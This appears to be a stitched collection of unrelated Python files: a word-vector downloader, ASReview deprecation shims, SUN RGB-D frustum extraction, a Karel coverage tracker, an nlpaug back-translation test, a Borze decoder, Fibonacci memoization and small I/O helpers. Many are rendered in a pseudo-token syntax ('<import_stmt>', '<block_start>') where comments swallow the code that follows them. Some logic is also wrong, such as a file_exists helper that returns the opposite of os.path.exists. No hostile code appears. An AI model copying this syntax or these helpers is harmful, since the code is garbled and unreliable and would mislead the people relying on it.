# -*- coding: utf-8 -*- <import_stmt>os<import_stmt>pandas<as>pd<import_from_stmt>progressbar Bar ETA FileTransferSpeed ProgressBar Percentage RotatingMarker<import_from_stmt>six.moves.urllib.request urlretrieve<def_stmt>load_datasets path=os.path.join(os.path.dirname(__file__) 'datasets.csv')<block_start>datasets=pd.read_csv(path)<line_sep><return>datasets<block_end><def_stmt>download number=-1 name="" save_dir='./'<block_start>"""Download pre-trained word vector :param number: integer, default ``None`` :param save_dir: str, default './' :return: file path for downloaded file """<line_sep>df=load_datasets()<if_stmt>number<g>-1<block_start>row=df.iloc[[number]]<block_end><elif_stmt>name<block_start>row=df.loc[df["Name"]<eq>name]<block_end>url=''.join(row.URL)<if_stmt><not>url<block_start>print('The word vector you specified was not found. Please specify correct name.')<block_end>widgets=['Test: ' Percentage() ' ' Bar(marker=RotatingMarker()) ' ' ETA() ' ' FileTransferSpeed()]<line_sep>pbar=ProgressBar(widgets=widgets)<def_stmt>dlProgress count blockSize totalSize<block_start><if_stmt>pbar.max_value<is><none><block_start>pbar.max_value=totalSize<line_sep>pbar.start()<block_end>pbar.update(min(count<times>blockSize totalSize))<block_end>file_name=url.split('/')[-1]<if_stmt><not>os.path.exists(save_dir)<block_start>os.makedirs(save_dir)<block_end>save_path=os.path.join(save_dir file_name)<line_sep>path,_=urlretrieve(url save_path reporthook=dlProgress)<line_sep>pbar.finish()<line_sep><return>path<block_end><def_stmt>search lang=''<block_start>"""Search pre-trained word vectors by their language :param lang: str, default '' :return: None print search result as pandas DataFrame """<line_sep>df=load_datasets()<if_stmt>lang<eq>''<block_start>print(df[['Name' 'Dimension' 'Corpus' 'VocabularySize' 'Method' 'Language' 'Author']])<block_end><else_stmt><block_start>rows=df[df.Language<eq>lang]<line_sep>print(rows[['Name' 'Dimension' 'Corpus' 'VocabularySize' 'Method' 
'Language' 'Author']])<block_end><block_end>
<import_from_stmt>collections Counter<import_from_stmt>datetime datetime timedelta<import_from_stmt>database connect_db<def_stmt>setup_arg_parser parser<block_start>parser.add_argument('days_ago' type=int default=0)<block_end><def_stmt>get_chat_id event<block_start><return>event.get('chat_id' event['chat']['id'])<block_end><def_stmt>main days_ago **kwargs<block_start>db=connect_db()<line_sep>day=datetime.utcnow().replace(hour=0 minute=0 second=0 microsecond=0)<for_stmt>x range(days_ago+1)<block_start>start=day-timedelta(days=x)<line_sep>end=start+timedelta(days=1)<line_sep>query={'type':'delete_msg' 'date':{'$gte':start '$lt':end } }<line_sep>del_count=0<line_sep>chat_reg=set()<for_stmt>event db.event.find(query)<block_start>del_count<augadd>1<line_sep>chat_reg.add(get_chat_id(event))<block_end>db.day_stat.find_one_and_update({'date':start} {'$set':{'delete_msg':del_count 'chat':len(chat_reg) }} upsert=<true> )<line_sep>print('Date: %s'%start)<line_sep>print(' * delete_msg: %d'%del_count)<line_sep>print(' * chat: %d'%len(chat_reg))<block_end><block_end>
# Copyright 2019-2020 The ASReview Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
#     http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.

# Deprecated module, will be removed in version 1.0.
# Each public name below is the relocated implementation wrapped by
# `_moved_warning`, which presumably emits a relocation notice on use.

from asreview.models.deprecated import _moved_warning
from asreview.models.query.max import MaxQuery as _MaxQuery
from asreview.models.query.mixed import MixedQuery as _MixedQuery
from asreview.models.query.uncertainty import UncertaintyQuery as _UncertaintyQuery
from asreview.models.query.random import RandomQuery as _RandomQuery
from asreview.models.query.cluster import ClusterQuery as _ClusterQuery
from asreview.models.query.utils import get_query_model as _get_query_model
from asreview.models.query.utils import get_query_class as _get_query_class
from asreview.models.query.utils import list_query_strategies as _list_query_strategies

MaxQuery = _moved_warning(
    _MaxQuery,
    "asreview.models.query.MaxQuery",
    "asreview.query_strategies.MaxQuery")

MixedQuery = _moved_warning(
    _MixedQuery,
    "asreview.models.query.MixedQuery",
    "asreview.query_strategies.MixedQuery")

UncertaintyQuery = _moved_warning(
    _UncertaintyQuery,
    "asreview.models.query.UncertaintyQuery",
    "asreview.query_strategies.UncertaintyQuery")

RandomQuery = _moved_warning(
    _RandomQuery,
    "asreview.models.query.RandomQuery",
    "asreview.query_strategies.RandomQuery")

ClusterQuery = _moved_warning(
    _ClusterQuery,
    "asreview.models.query.ClusterQuery",
    "asreview.query_strategies.ClusterQuery")

get_query_model = _moved_warning(
    _get_query_model,
    "asreview.models.query.get_query_model",
    "asreview.query_strategies.get_query_model")

get_query_class = _moved_warning(
    _get_query_class,
    "asreview.models.query.get_query_class",
    "asreview.query_strategies.get_query_class")

list_query_strategies = _moved_warning(
    _list_query_strategies,
    "asreview.models.query.list_query_strategies",
    "asreview.query_strategies.list_query_strategies")
''' Helper class and functions for loading SUN RGB-D objects

Author: <NAME>
Date: October 2017
Modified by <NAME>
'''
import os
import sys
import numpy as np
import pickle
import argparse
from PIL import Image

BASE_DIR = os.path.dirname(os.path.abspath(__file__))
sys.path.append(BASE_DIR)
import sunrgbd_utils as utils
from sunrgbd_object import sunrgbd_object
from sunrgbd_utils import random_shift_box2d, extract_pc_in_box3d


def ravel_hash(coord):
    """Hash integer (N, D) coordinates into unique scalar keys (row-major)."""
    assert coord.ndim == 2
    # Bug fix: copy instead of in-place `-=` so the caller's array is never
    # mutated as a side effect.
    coord = coord - coord.min(0)
    coord_max = coord.max(0) + 1
    keys = np.zeros(coord.shape[0], dtype=np.int64)
    # keys = ((c0 * max1 + c1) * max2 + c2) ...
    for i in range(coord.shape[1] - 1):
        keys += coord[:, i]
        keys *= coord_max[i + 1]
    keys += coord[:, -1]
    return keys


def down_sample(x, voxel_size=(0.05,)):
    """Voxel-grid downsample: return indices of one point per occupied voxel."""
    if isinstance(voxel_size, float):
        voxel_size = (voxel_size,)
    if len(voxel_size) == 1:
        voxel_size = voxel_size * 3
    voxel_size = np.array(voxel_size, dtype=np.float32)
    voxel_index = np.floor(x / voxel_size).astype(np.int64, copy=False)
    hash_keys = ravel_hash(voxel_index)
    _, idx = np.unique(hash_keys, return_index=True)
    return idx


def get_box3d_dim_statistics(my_sunrgbd_dir, idx_filename, type_whitelist):
    """Print per-class median 3D box sizes (half-dims doubled to full dims)."""
    dataset = sunrgbd_object(my_sunrgbd_dir)
    dimension_list = []
    type_list = []
    data_idx_list = [int(line.rstrip()) for line in open(idx_filename)]
    for data_idx in data_idx_list:
        print('------------- ', data_idx)
        objects = dataset.get_label_objects(data_idx)
        for obj_idx in range(len(objects)):
            obj = objects[obj_idx]
            if obj.classname not in type_whitelist:
                continue
            dimension_list.append(np.array([obj.l, obj.w, obj.h]))
            type_list.append(obj.classname)
    print("number of objects: {}".format(len(type_list)))
    print("categories:", list(sorted(type_whitelist)))
    # Get average box size for different categories
    for class_type in sorted(set(type_list)):
        cnt = 0
        box3d_list = []
        for i in range(len(dimension_list)):
            if type_list[i] == class_type:
                cnt += 1
                box3d_list.append(dimension_list[i])
        median_box3d = np.median(box3d_list, 0)
        print("\'%s\': np.array([%f,%f,%f])," %
              (class_type, median_box3d[0] * 2, median_box3d[1] * 2,
               median_box3d[2] * 2))


def read_det_file(det_file):
    """Parse a text detection file: `data_idx type prob x1 y1 x2 y2` per line."""
    id_list = []
    type_list = []
    prob_list = []
    box2d_list = []
    with open(det_file, 'rt') as f:
        for line in f:
            t = line.rstrip().split(" ")
            id_list.append(int(t[0]))
            type_list.append(t[1])
            prob_list.append(float(t[2]))
            box2d_list.append(np.array([float(t[i]) for i in range(3, 7)]))
    return id_list, type_list, box2d_list, prob_list


def read_det_pkl_file(det_file):
    """Parse a pickled detection file: dets[class][image] -> rows of x1,y1,x2,y2,score."""
    classes = ['__background__', 'bathtub', 'bed', 'bookshelf', 'box', 'chair',
               'counter', 'desk', 'door', 'dresser', 'garbage_bin', 'lamp',
               'monitor', 'night_stand', 'pillow', 'sink', 'sofa', 'table',
               'tv', 'toilet']
    with open(det_file, 'rb') as f:
        dets = pickle.load(f)
    num_classes = len(dets)
    num_images = len(dets[0])
    id_list = []
    type_list = []
    prob_list = []
    box2d_list = []
    for i in range(num_images):
        for c in range(1, num_classes):
            det = dets[c][i]
            for j in range(len(det)):
                id_list.append((i + 1))
                type_list.append(classes[c])
                prob_list.append(det[j][4])
                box2d_list.append(det[j][:4])
    return id_list, type_list, box2d_list, prob_list


def extract_frustum_data(sunrgbd_dir, idx_filename, split, output_filename,
                         type_whitelist, perturb_box2d=False, augmentX=1,
                         with_down_sample=False):
    """Extract frustum point clouds from ground-truth 2D boxes and pickle them.

    Each whitelisted GT object contributes `augmentX` (optionally perturbed)
    2D boxes; the points in each box frustum are stored with 3D box labels.
    """
    dataset = sunrgbd_object(sunrgbd_dir, split)
    data_idx_list = [int(line.rstrip()) for line in open(idx_filename)]

    id_list = []  # int number
    box2d_list = []  # [xmin,ymin,xmax,ymax]
    box3d_list = []  # (8,3) array in upright depth coord
    input_list = []  # channel number = 6, xyz,rgb in upright depth coord
    label_list = []  # 1 for roi object, 0 for clutter
    type_list = []  # string e.g. bed
    heading_list = []  # face of object angle, radius of clockwise angle from
                       # positive x axis in upright camera coord
    box3d_size_list = []  # array of l,w,h
    frustum_angle_list = []  # angle of 2d box center from pos x-axis (clockwise)
    img_coord_list = []
    calib_K_list = []
    calib_R_list = []

    pos_cnt = 0
    all_cnt = 0
    for data_idx in data_idx_list:
        print('------------- ', data_idx)
        calib = dataset.get_calibration(data_idx)
        objects = dataset.get_label_objects(data_idx)
        pc_upright_depth = dataset.get_pointcloud(data_idx)
        pc_upright_camera = np.zeros_like(pc_upright_depth)
        pc_upright_camera[:, 0:3] = calib.project_upright_depth_to_upright_camera(
            pc_upright_depth[:, 0:3])
        pc_upright_camera[:, 3:] = pc_upright_depth[:, 3:]
        if with_down_sample:
            idx = down_sample(pc_upright_camera[:, :3], 0.01)
            pc_upright_camera = pc_upright_camera[idx]
            pc_upright_depth = pc_upright_depth[idx]

        pc_image_coord, _ = calib.project_upright_depth_to_image(pc_upright_depth)

        for obj_idx in range(len(objects)):
            obj = objects[obj_idx]
            if obj.classname not in type_whitelist:
                continue

            # 2D BOX: Get pts rect backprojected
            box2d = obj.box2d
            for _ in range(augmentX):
                if perturb_box2d:
                    xmin, ymin, xmax, ymax = random_shift_box2d(box2d)
                else:
                    xmin, ymin, xmax, ymax = box2d
                box_fov_inds = (pc_image_coord[:, 0] < xmax) & \
                               (pc_image_coord[:, 0] >= xmin) & \
                               (pc_image_coord[:, 1] < ymax) & \
                               (pc_image_coord[:, 1] >= ymin)
                coord_in_box_fov = pc_image_coord[box_fov_inds, :]
                pc_in_box_fov = pc_upright_camera[box_fov_inds, :]

                # Get frustum angle (according to center pixel in 2D BOX)
                box2d_center = np.array([(xmin + xmax) / 2.0,
                                         (ymin + ymax) / 2.0])
                uvdepth = np.zeros((1, 3))
                uvdepth[0, 0:2] = box2d_center
                uvdepth[0, 2] = 20  # some random depth
                box2d_center_upright_camera = \
                    calib.project_image_to_upright_camera(uvdepth)
                # angle as to positive x-axis as in the Zoox paper
                frustum_angle = -1 * np.arctan2(
                    box2d_center_upright_camera[0, 2],
                    box2d_center_upright_camera[0, 0])

                # 3D BOX: Get pts velo in 3d box
                box3d_pts_2d, box3d_pts_3d = utils.compute_box_3d(obj, calib)
                box3d_pts_3d = calib.project_upright_depth_to_upright_camera(
                    box3d_pts_3d)
                try:
                    _, inds = extract_pc_in_box3d(pc_in_box_fov, box3d_pts_3d)
                except Exception as e:
                    print(e)
                    continue
                label = np.zeros((pc_in_box_fov.shape[0]))
                label[inds] = 1
                box3d_size = np.array([2 * obj.l, 2 * obj.w, 2 * obj.h])

                # Subsample points..
                num_point = pc_in_box_fov.shape[0]
                if num_point > 2048:
                    choice = np.random.choice(pc_in_box_fov.shape[0], 2048,
                                              replace=False)
                    coord_in_box_fov = coord_in_box_fov[choice, :]
                    pc_in_box_fov = pc_in_box_fov[choice, :]
                    label = label[choice]
                # Reject object with too few points
                if np.sum(label) < 5:
                    continue

                id_list.append(data_idx)
                box2d_list.append(np.array([xmin, ymin, xmax, ymax],
                                           dtype=np.float32))
                box3d_list.append(box3d_pts_3d)
                input_list.append(pc_in_box_fov.astype(np.float32))
                # Bug fix: `np.bool` was removed in NumPy 1.24; the builtin
                # `bool` is the documented replacement.
                label_list.append(label.astype(bool))
                type_list.append(obj.classname)
                heading_list.append(obj.heading_angle)
                box3d_size_list.append(box3d_size)
                frustum_angle_list.append(frustum_angle)
                img_coord_list.append(coord_in_box_fov.astype(np.float32))
                calib_K_list.append(calib.K)
                calib_R_list.append(calib.Rtilt)

                # collect statistics
                pos_cnt += np.sum(label)
                all_cnt += pc_in_box_fov.shape[0]

    print('Average pos ratio: ', pos_cnt / float(all_cnt))
    print('Average npoints: ', float(all_cnt) / len(id_list))

    data_dict = {
        'id': id_list,
        'box2d': box2d_list,
        'box3d': box3d_list,
        'box3d_size': box3d_size_list,
        'box3d_heading': heading_list,
        'type': type_list,
        'input': input_list,
        'frustum_angle': frustum_angle_list,
        'label': label_list,
        'calib_K': calib_K_list,
        'calib_R': calib_R_list,
        # 'image_coord': img_coord_list,
    }
    with open(output_filename, 'wb') as f:
        pickle.dump(data_dict, f, -1)
    print("save in {}".format(output_filename))


def extract_frustum_data_from_rgb_detection(sunrgbd_dir, det_file, split,
                                            output_filename, type_whitelist,
                                            valid_id_list=None,
                                            with_down_sample=False):
    """Extract frustum point clouds from RGB-detector 2D boxes and pickle them."""
    dataset = sunrgbd_object(sunrgbd_dir, split)
    if det_file.split('.')[-1] == 'txt':
        det_id_list, det_type_list, det_box2d_list, det_prob_list = \
            read_det_file(det_file)
    else:
        det_id_list, det_type_list, det_box2d_list, det_prob_list = \
            read_det_pkl_file(det_file)

    cache_id = -1
    cache = None

    id_list = []
    type_list = []
    box2d_list = []
    prob_list = []
    input_list = []  # channel number = 4, xyz,intensity in rect camera coord
    frustum_angle_list = []  # angle of 2d box center from pos x-axis
    img_coord_list = []
    calib_K_list = []
    calib_R_list = []

    for det_idx in range(len(det_id_list)):
        data_idx = det_id_list[det_idx]
        if valid_id_list is not None and data_idx not in valid_id_list:
            continue
        if det_type_list[det_idx] not in type_whitelist:
            continue
        print('det idx: %d/%d, data idx: %d' %
              (det_idx, len(det_id_list), data_idx))
        # Point clouds are expensive to load; reuse across consecutive
        # detections of the same image (detections arrive grouped by image).
        if cache_id != data_idx:
            calib = dataset.get_calibration(data_idx)
            pc_upright_depth = dataset.get_pointcloud(data_idx)
            pc_upright_camera = np.zeros_like(pc_upright_depth)
            pc_upright_camera[:, 0:3] = \
                calib.project_upright_depth_to_upright_camera(
                    pc_upright_depth[:, 0:3])
            pc_upright_camera[:, 3:] = pc_upright_depth[:, 3:]
            if with_down_sample:
                idx = down_sample(pc_upright_camera[:, :3], 0.01)
                pc_upright_camera = pc_upright_camera[idx]
                pc_upright_depth = pc_upright_depth[idx]
            pc_image_coord, _ = calib.project_upright_depth_to_image(
                pc_upright_depth)
            cache = [calib, pc_upright_camera, pc_image_coord]
            cache_id = data_idx
        else:
            calib, pc_upright_camera, pc_image_coord = cache

        # 2D BOX: Get pts rect backprojected
        xmin, ymin, xmax, ymax = det_box2d_list[det_idx]
        box_fov_inds = (pc_image_coord[:, 0] < xmax) & \
                       (pc_image_coord[:, 0] >= xmin) & \
                       (pc_image_coord[:, 1] < ymax) & \
                       (pc_image_coord[:, 1] >= ymin)
        coord_in_box_fov = pc_image_coord[box_fov_inds, :]
        pc_in_box_fov = pc_upright_camera[box_fov_inds, :]

        # Get frustum angle (according to center pixel in 2D BOX)
        box2d_center = np.array([(xmin + xmax) / 2.0, (ymin + ymax) / 2.0])
        uvdepth = np.zeros((1, 3))
        uvdepth[0, 0:2] = box2d_center
        uvdepth[0, 2] = 20  # some random depth
        box2d_center_upright_camera = \
            calib.project_image_to_upright_camera(uvdepth)
        # angle as to positive x-axis as in the Zoox paper
        frustum_angle = -1 * np.arctan2(
            box2d_center_upright_camera[0, 2],
            box2d_center_upright_camera[0, 0])

        # Subsample points..
        num_point = pc_in_box_fov.shape[0]
        if num_point > 2048:
            choice = np.random.choice(pc_in_box_fov.shape[0], 2048,
                                      replace=False)
            coord_in_box_fov = coord_in_box_fov[choice, :]
            pc_in_box_fov = pc_in_box_fov[choice, :]
        # Pass objects that are too small
        if len(pc_in_box_fov) < 5:
            continue

        id_list.append(data_idx)
        type_list.append(det_type_list[det_idx])
        box2d_list.append(det_box2d_list[det_idx])
        prob_list.append(det_prob_list[det_idx])
        input_list.append(pc_in_box_fov.astype(np.float32))
        frustum_angle_list.append(frustum_angle)
        img_coord_list.append(coord_in_box_fov.astype(np.float32))
        calib_K_list.append(calib.K)
        calib_R_list.append(calib.Rtilt)

    data_dict = {
        'id': id_list,
        'type': type_list,
        'box2d': box2d_list,
        'box2d_prob': prob_list,
        'input': input_list,
        'frustum_angle': frustum_angle_list,
        'calib_K': calib_K_list,
        'calib_R': calib_R_list,
        # 'image_coord': img_coord_list,
    }
    with open(output_filename, 'wb') as f:
        pickle.dump(data_dict, f, -1)
    print("save in {}".format(output_filename))


if __name__ == '__main__':
    parser = argparse.ArgumentParser()
    parser.add_argument('--gen_train', action='store_true',
                        help='Generate train split frustum data with perturbed GT 2D boxes')
    parser.add_argument('--gen_val', action='store_true',
                        help='Generate val split frustum data with GT 2D boxes')
    parser.add_argument('--gen_val_rgb_detection', action='store_true',
                        help='Generate val split frustum data with RGB detection 2D boxes')
    parser.add_argument('--num_classes', default=10, type=int,
                        help='19 or 10 categories, default 10')
    parser.add_argument('--save_dir', default='sunrgbd/data/pickle_data', type=str,
                        help='directory to save data, default[sunrgbd/data/pickle_data]')
    parser.add_argument('--gen_avg_dim', action='store_true',
                        help='get average dimension of each class')
    args = parser.parse_args()

    my_sunrgbd_dir = 'sunrgbd/mysunrgbd'  # change if you do not set default path
    if args.num_classes == 10:
        type_whitelist = ['bed', 'table', 'sofa', 'chair', 'toilet', 'desk',
                          'dresser', 'night_stand', 'bookshelf', 'bathtub']
    elif args.num_classes == 19:
        type_whitelist = ['bathtub', 'bed', 'bookshelf', 'box', 'chair',
                          'counter', 'desk', 'door', 'dresser', 'garbage_bin',
                          'lamp', 'monitor', 'night_stand', 'pillow', 'sink',
                          'sofa', 'table', 'tv', 'toilet']
    else:
        # Bug fix: `assert False` is stripped when running with `python -O`;
        # raise explicitly for argument validation.
        raise ValueError('please set correct num_classes')
    type_whitelist = set(type_whitelist)

    if args.gen_avg_dim:
        get_box3d_dim_statistics(my_sunrgbd_dir, 'sunrgbd/image_sets/train.txt',
                                 type_whitelist)

    save_dir = args.save_dir
    if not os.path.exists(save_dir):
        os.makedirs(save_dir)

    if args.gen_train:
        extract_frustum_data(
            my_sunrgbd_dir, 'sunrgbd/image_sets/train.txt', 'training',
            output_filename=os.path.join(save_dir, 'sunrgbd_train_aug5x.pickle'),
            type_whitelist=type_whitelist, perturb_box2d=True, augmentX=5,
            with_down_sample=False)

    if args.gen_val:
        extract_frustum_data(
            my_sunrgbd_dir, 'sunrgbd/image_sets/val.txt', 'training',
            output_filename=os.path.join(save_dir, 'sunrgbd_val.pickle'),
            type_whitelist=type_whitelist, perturb_box2d=False, augmentX=1,
            with_down_sample=False)

    if args.gen_val_rgb_detection:
        extract_frustum_data_from_rgb_detection(
            my_sunrgbd_dir,
            './sunrgbd/rgb_detections/sunrgbd_rgb_det_val_classes19_mAP50.2.txt',
            'training', os.path.join(save_dir, 'sunrgbd_rgb_det_val.pickle'),
            type_whitelist=type_whitelist)
<import_from_stmt>program_synthesis.karel.dataset executor<import_from_stmt>program_synthesis.karel.dataset parser_for_synthesis<line_sep>branch_types={'if' 'ifElse' 'while'}<line_sep>stmt_types={'move' 'turnLeft' 'turnRight' 'putMarker' 'pickMarker'}<class_stmt>CoverageMeasurer(object)<block_start><def_stmt>__init__ self code<block_start>self.parser=parser_for_synthesis.KarelForSynthesisParser(build_tree=<true>)<line_sep>self.executor=executor.KarelExecutor()<line_sep>self.code=code<line_sep>tree=self.parser.parse(code)<line_sep># Statement coverage: actions self.stmt_coverage={span:0<for>span self.parser.action_spans}<line_sep># Branch coverage: if, ifelse, while self.branch_coverage={(span cond_value):0<for>span self.parser.cond_block_spans<for>cond_value (<true> <false>)}<block_end><def_stmt>add self inp<block_start>out,trace=self.executor.execute(self.code <none> inp record_trace=<true>)<if_stmt><not>out<block_start><return><false><block_end><for_stmt>event trace.events<block_start><if_stmt>event.type<in>branch_types<block_start>self.branch_coverage[event.span event.cond_value]<augadd>1<block_end><elif_stmt>event.type<in>stmt_types<block_start>self.stmt_coverage[event.span]<augadd>1<block_end><block_end><return><true><block_end><def_stmt>uncovered self<block_start><return>(tuple(k<for>k,v self.stmt_coverage.iteritems()<if>v<eq>0) tuple(k<for>k,v self.branch_coverage.iteritems()<if>v<eq>0))<block_end><block_end>
import unittest
import os

import torch
from dotenv import load_dotenv

import nlpaug.augmenter.word as naw
import nlpaug.model.lang_models as nml


class TestBackTranslationAug(unittest.TestCase):
    """Tests for back-translation augmentation (EN -> DE -> EN)."""

    @classmethod
    def setUpClass(cls):
        env_config_path = os.path.abspath(
            os.path.join(os.path.dirname(__file__), '..', '..', '..', '.env'))
        load_dotenv(env_config_path)

        cls.text = 'The quick brown fox jumps over the lazy dog'
        cls.texts = [
            'The quick brown fox jumps over the lazy dog',
            "Seeing all of the negative reviews for this movie, I figured that it could be yet another comic masterpiece that wasn't quite meant to be."
        ]
        cls.eng_model_names = [{
            'from_model_name': 'facebook/wmt19-en-de',
            'to_model_name': 'facebook/wmt19-de-en',
        }]

    def sample_test_case(self, device):
        # From English
        for model_name in self.eng_model_names:
            aug = naw.BackTranslationAug(
                from_model_name=model_name['from_model_name'],
                to_model_name=model_name['to_model_name'],
                device=device)

            augmented_text = aug.augment(self.text)
            aug.clear_cache()
            self.assertNotEqual(self.text, augmented_text)

            augmented_texts = aug.augment(self.texts)
            aug.clear_cache()
            for original, augmented in zip(self.texts, augmented_texts):
                self.assertNotEqual(original, augmented)

            # The augmenter must actually run on the requested device.
            if device == 'cpu':
                self.assertTrue(device == aug.model.get_device())
            elif 'cuda' in device:
                self.assertTrue('cuda' in aug.model.get_device())

    def test_back_translation(self):
        if torch.cuda.is_available():
            self.sample_test_case('cuda')
        self.sample_test_case('cpu')

    def test_batch_size(self):
        model_name = self.eng_model_names[0]

        def augment_with_batch_size(batch_size, texts):
            # Local helper: build an augmenter with the given batch size and
            # return the augmented output for `texts`.
            aug = naw.BackTranslationAug(
                from_model_name=model_name['from_model_name'],
                to_model_name=model_name['to_model_name'],
                batch_size=batch_size)
            return aug.augment(texts)

        # 1 per batch
        self.assertEqual(len(augment_with_batch_size(1, self.texts)),
                         len(self.texts))
        # batch size = input size
        self.assertEqual(len(augment_with_batch_size(len(self.texts), self.texts)),
                         len(self.texts))
        # batch size > input size
        self.assertEqual(len(augment_with_batch_size(len(self.texts) + 1, self.texts)),
                         len(self.texts))
        # input size > batch size
        self.assertEqual(len(augment_with_batch_size(2, self.texts * 2)),
                         len(self.texts) * 2)
<import_stmt>os<import_stmt>re<import_stmt>sys<import_stmt>cffi<import_from_stmt>._compat PY2<line_sep>_directive_re=re.compile(r'^\s*#.*?$(?m)')<def_stmt>make_ffi module_path crate_path cached_header_filename=<none><block_start>"""Creates a FFI instance for the given configuration."""<if_stmt>cached_header_filename<is><not><none><and>os.path.isfile(cached_header_filename)<block_start><with_stmt>open(cached_header_filename 'rb')<as>f<block_start>header=f.read()<block_end><if_stmt><not>PY2<block_start>header=header.decode('utf-8')<block_end><block_end><else_stmt><block_start><import_from_stmt>.bindgen generate_header<line_sep>header=generate_header(crate_path)<block_end>header=_directive_re.sub('' header)<if_stmt>os.environ.get('SNAEK_DEBUG_HEADER')<eq>'1'<block_start>sys.stderr.write('/* generated header for "%s" */\n'%module_path)<line_sep>sys.stderr.write(header)<line_sep>sys.stderr.write('\n')<line_sep>sys.stderr.flush()<block_end>ffi=cffi.FFI()<line_sep>ffi.cdef(header)<line_sep>ffi.set_source(module_path <none>)<line_sep><return>ffi<block_end>
<import_from_future_stmt> absolute_import<import_from_stmt>.numpy_wrapper *<import_from_stmt>. numpy_boxes<import_from_stmt>. numpy_vspaces<import_from_stmt>. numpy_vjps<import_from_stmt>. numpy_jvps<import_from_stmt>. linalg<import_from_stmt>. fft<import_from_stmt>. random<line_sep>
<import_stmt>os<import_from_stmt>unittest TestCase<import_from_stmt>keras_gpt_2 get_bpe_from_files<class_stmt>TestBPE(TestCase)<block_start><def_stmt>test_encode_and_decode self<block_start>current_path=os.path.dirname(os.path.abspath(__file__))<line_sep>toy_checkpoint_path=os.path.join(current_path 'toy_checkpoint')<line_sep>encoder_path=os.path.join(toy_checkpoint_path 'encoder.json')<line_sep>vocab_path=os.path.join(toy_checkpoint_path 'vocab.bpe')<line_sep>bpe=get_bpe_from_files(encoder_path vocab_path)<line_sep>text='Power, give me more power!'<line_sep>indices=bpe.encode(text)<line_sep>self.assertEqual([13434 11 1577 502 517 1176 0] indices)<line_sep>self.assertEqual(text bpe.decode(indices))<line_sep>self.assertEqual(text bpe.decode(bpe.encode(text)))<block_end><block_end>
# Ternary numeric notation is quite popular in Berland. To telegraph the ternary number the Borze alphabet is used. Digit 0 is transmitted as «.», 1 as «-.» and 2 as «--». You are to decode the Borze code, i.e. to find out the ternary number given its representation in Borze alphabet. # Input # The first line contains a number in Borze code. The length of the string is between 1 and 200 characters. It's guaranteed that the given string is a valid Borze code of some ternary number (this number can have leading zeroes). # Output # Output the decoded ternary number. It can have leading zeroes. # input # .-.-- # output # 012 # input # --. # output # 20 # input # -..-.-- # output # 1012 s=input()#input the string size=len(s)# it calculate the size of the input string i=0# pointed at starting of the string j=i+1<line_sep>string=""#empty string <while_stmt>j<l>len(s)# this loop works till j == size of the input string(s) <block_start><if_stmt>s[i]<eq>"."<block_start>string<augadd>"0"<line_sep>i=j<line_sep>j=i+1<block_end><elif_stmt>s[i]<eq>"-"<and>s[j]<eq>"."<block_start>string<augadd>"1"<line_sep>i=j+1<line_sep>j=i+1<block_end><elif_stmt>s[i]<eq>"-"<and>s[j]<eq>"-"<block_start>string<augadd>"2"<line_sep>i=j+1<line_sep>j=i+1<block_end><block_end><while_stmt>i<l>len(s)<block_start><if_stmt>s[i]<eq>"."<block_start>string<augadd>"0"<block_end>i<augadd>1<block_end>print(string)<line_sep>
# source: http://oeis.org/A000045 fibo_seq=[0 1 1 2 3 5 8 13 21 34 55 89 144 233 377 610 987 1597 2584 4181 6765 10946 17711 28657 46368 75025 121393 196418 317811 514229 832040 1346269 2178309 3524578 5702887 9227465 14930352 24157817 39088169]<import_from_stmt>functools lru_cache<def_stmt>fibonacci n<block_start><if_stmt>n<l>2<block_start><return>n<block_end><return>fibonacci(n-2)+fibonacci(n-1)<block_end>@lru_cache()<def_stmt>fibonacci2 n<block_start><if_stmt>n<l>2<block_start><return>n<block_end><return>fibonacci2(n-2)+fibonacci2(n-1)<block_end><def_stmt>memoize func<block_start>'''simplest memoizing decorator'''<line_sep>cache={}<def_stmt>memoized *args<block_start><if_stmt>args<not><in>cache<block_start>cache[args]=func(*args)<block_end><return>cache[args]<block_end><return>memoized<block_end><def_stmt>test <block_start><for_stmt>i,expected enumerate(fibo_seq[:31])<block_start>print(i expected)<assert_stmt>fibonacci(i)<eq>expected<block_end><block_end><def_stmt>chronograph <block_start><global>fibonacci<import_from_stmt>time time<line_sep>t0=time()<line_sep>n=32<line_sep>res=fibonacci(n)<line_sep>#res = [fibonacci(n) for n in range(30)] t1=time()<line_sep>print(n res format(t1-t0 '0.6f'))<line_sep>t0=time()<line_sep>res=fibonacci2(n)<line_sep>#res = [fibonacci2(n) for n in range(30)] t1=time()<line_sep>print(n res format(t1-t0 '0.6f'))<line_sep>t0=time()<line_sep>fibonacci=memoize(fibonacci)<line_sep>res=fibonacci(n)<line_sep>#res = [fibonacci2(n) for n in range(30)] t1=time()<line_sep>print(n res format(t1-t0 '0.6f'))<block_end><if_stmt>__name__<eq>'__main__'#test() <block_start>chronograph()<block_end>
# This recipe toggles on several layers in our "_Opt" maps # Load town one with only minimum layout (roads, sidewalks, traffic lights and traffic signs) world=client.load_world('Town01_Opt' carla.MapLayer.None)<line_sep># Toggle all buildings on world.load_map_layer(carla.MapLayer.Buildings)<line_sep># Toggle all foliage on world.load_map_layer(carla.MapLayer.Foliage)<line_sep># Toggle all parked vehicles on world.load_map_layer(carla.MapLayer.ParkedVehicles)<line_sep>
""" Some useful I/O functions """<import_stmt>os<import_stmt>pickle<import_stmt>shutil<line_sep># get all directories in a specific directory <def_stmt>get_directories path<block_start><return>[f<for>f os.listdir(path)<if>os.path.isdir(os.path.join(path f))]<block_end># get all the files in a specific directory # extension can be string or tuple of strings <def_stmt>get_files path extension=<none><block_start>files=[f<for>f os.listdir(path)<if>os.path.isfile(os.path.join(path f))]<if_stmt>extension<is><not><none><block_start>files=[f<for>f files<if>f.lower().endswith(extension)]<block_end><return>files<block_end># get all files in a specific directory <def_stmt>file_exists path<block_start><return><not>os.path.exists(path)<block_end># make directory <def_stmt>makedir path replace_existing=<false><block_start><if_stmt><not>os.path.exists(path)<block_start>os.makedirs(path)<block_end><elif_stmt>replace_existing<block_start>shutil.rmtree(path)<line_sep>os.makedirs(path)<block_end><else_stmt><block_start>print("Beware .. path {} already exists".format(path))<block_end><block_end># extract relative path from a root-directory and an absolute path <def_stmt>relative_path root path<block_start><return>os.path.relpath(path root)<block_end># save pickle 